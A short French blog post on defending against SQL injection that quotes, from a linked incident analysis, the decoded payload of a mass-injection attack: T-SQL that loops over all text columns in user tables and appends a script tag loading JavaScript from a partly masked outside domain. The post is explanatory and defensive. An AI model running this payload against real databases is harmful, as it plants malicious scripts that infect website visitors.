Compartilhar via


Se prémunir des attaques de type "SQL Injection"...

Pour mieux comprendre les risques auxquels sont exposées vos bases de données, il est intéressant de consacrer un peu de temps à l'étude des attaques et aux moyens à mettre en place pour s'en prémunir.

 

Vous trouverez sur ces liens une analyse des attaques récentes.

 image

Anatomy of a SQL Injection Incident 

Anatomy of a SQL Injection Incident, Part 2: Meat 

 

En substance, cela ressemble à ca :

This looks a little complicated but, if we remove the encoding, we get this:

DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x440045004300...7200 AS NVARCHAR(4000));
EXEC(@S);--

So, of course, the next question is "What is that string?" Here it is, with a bit of sanitization:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=https://www.211796*.net/f****p.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Comments

  • Anonymous
    January 01, 2003
    Pour faire suite &#224; mon message du 19 mars &quot; Se pr&#233;munir des attaques de type &quot;SQL

  • Anonymous
    January 01, 2003
    Suite aux r&#233;centes alertes de s&#233;curit&#233; dont je m'&#233;tais fait l'&#233;cho ici et l&#224;